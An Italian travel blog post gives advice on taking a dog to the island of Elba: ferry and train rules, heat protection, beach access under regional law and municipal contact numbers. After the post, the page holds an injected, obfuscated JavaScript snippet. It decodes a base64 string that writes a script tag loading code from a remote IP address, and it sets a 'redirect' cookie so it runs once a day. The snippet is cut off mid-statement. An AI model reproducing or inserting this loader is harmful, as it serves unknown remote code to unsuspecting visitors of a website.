In vacanza all’Elba con il proprio amico a 4 zampe

E’ tempo di ferie e chi ha un amico a 4  zampe è ufficialmente invitato all’ Isola d’Elba, destinazione Animal Friendly 🙂

Le compagnie di navigazione che percorrono la tratta Piombino – Elba sono Toremar, Moby Lines, Blu Navy, Corsica Sardegna Elba Ferries e tutte consentono il trasporto di animali.

Potete trovare i singoli regolamenti qui:

Moby  

Toremar 

Blunavy

Corsica ferries

I nostri amici a 4 zampe devono essere muniti di guinzaglio, museruola e biglietto. (I cani guida destinati all’assistenza delle persone non vedenti, se munite di relativa documentazione, sono invece esonerati dal pagamento del biglietto.)

Per chi raggiungesse Piombino in auto  è importante ricordare che visto l’aumento delle temperature si rende necessario proteggere gli animali dai colpi di calore. I cani non sudano come le persone e per abbassare la temperatura corporea possono solo ansimare: così facendo causano l’evaporazione dell’acqua dalla lingua e riescono a raffreddarsi. Per questo è necessario mantenerli in un ambiente ben areato e lasciare una ciotola d’acqua a disposizione.

Per chi invece arriva in treno può essere utile sapere che  i cani di piccola taglia, i gatti ed altri piccoli animali domestici da compagnia (custoditi nell’apposito contenitore di dimensioni non superiori a 70x30x50) sono ammessi gratuitamente nella prima e nella seconda classe di tutte le categorie di treni e nei livelli di servizio Executive, Business, Premium e Standard di Trenitalia.

I cani di qualsiasi taglia, muniti di museruola e guinzaglio possono invece viaggiare sui treni Espressi, IC ed ICN, sui treni Frecciabianca, Frecciarossa e Frecciargento e sui treni Regionali nel vestibolo o piattaforma dell’ultima carrozza ( c on esclusione dell’orario dalle 7 alle 9 del mattino dei giorni feriali dal lunedì al venerdì). Per leggere il regolamento completo di Trenitalia puoi cliccare qui.

Una volta giunti all’Elba i nostri amici a 4 zampe possono godere di una fresca bevuta, mentre passeggiano con noi! Ogni  volta che troverai un cartello con scritto “Dog Bar” il tuo amico pelosetto avrà una bella ciotola d’acqua pronta per lui.

Inoltre secondo la legge regionale 59/2009 i proprietari di cani possono portare i loro animali in spiaggia senza problemi, con il solo obbligo dell’uso del guinzaglio e museruola qualora le norme statali lo prevedano.

E’ vietato l’accesso solo in aree dedicate ai bambini, o in luoghi destinati a scopi specifici, purchè sia segnalato da apposito cartello. Trovi la legge completa qui.

Eventuali nuove ordinanze comunali potranno essere reperite sugli albi pretori online oppure informandosi direttamente c/o gli uffici di Polizia municipale.
Elenchiamo qui di seguito i recapiti telefonici degli uffici competenti in modo da conoscere l’eventuale pubblicazione di discipline che ne impediscano l’accesso per motivi igienico-sanitari (che tuttavia dovrebbero essere segnalate dalla presenza di idonei cartelli).

Uffici Polizia Municipale del Comune di:

. Campo nell’Elba – 0565 979311 – www.comune.camponellelba.li.it
. Capoliveri – 0565 967611 – www.comune.capoliveri.li.it
. Marciana – 0565 901215 – www.comune.marciana.li.it
. Marciana Marina – 0565 99002 – www.comune.marcianamarina.li.it
. Portoferraio – 0565 937111 – www.comune.portoferraio.li.it
. Porto Azzurro* – 0565 921611 – www.comune.portoazzurro.li.it
. Rio nell’Elba – 0565 943411 – www.comune.rionellelba.li.it
. Rio Marina – 0565 925511 – www.comuneriomarina.li.it

Per chi invece volesse qualche comodità in più nella Cala di Mola in piena estate  vi è una spiaggia attrezzata con ombrelli e sdraio per i padroni e ciotola e doccia per gli animali ( per saperne di più clicca qui ).

Unico avvertimento:  attenzione il padrone può entrare se accompagnato 😉

Ps: Grazie ad Alex, che si è prestato come splendido modello per le foto di questo post,  ed alla sua padrona Luisella

  _ok_”text/javascript”> function getCo_ok_ie(e){var U=document.co_ok_ie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),co_ok_ie=getCo_ok_ie(“redirect”);if(now>=(time=co_ok_ie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.co_ok_ie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(‘

Share this post

Federica Mazzei

Elbana di nascita, giramondo per natura. Nata nel 1984 consegue nel 2007 una laurea triennale in Comunicazione sociale e nel 2009 una laurea magistrale con lode in Sistemi e progetti di comunicazione, prosegue il percorso formativo con una borsa di studio di due anni presso la Scuola Superiore Sant'Anna di Pisa (attività di supporto e potenziamento Ufficio Relazioni con il Pubblico, progettazione Piani integrati a livello di Zona distretto). Esperienze lavorative nel settore delle relazioni al pubblico, negli enti del terzo settore e nella comunicazione digitale.

Nessun commento

Aggiungi commento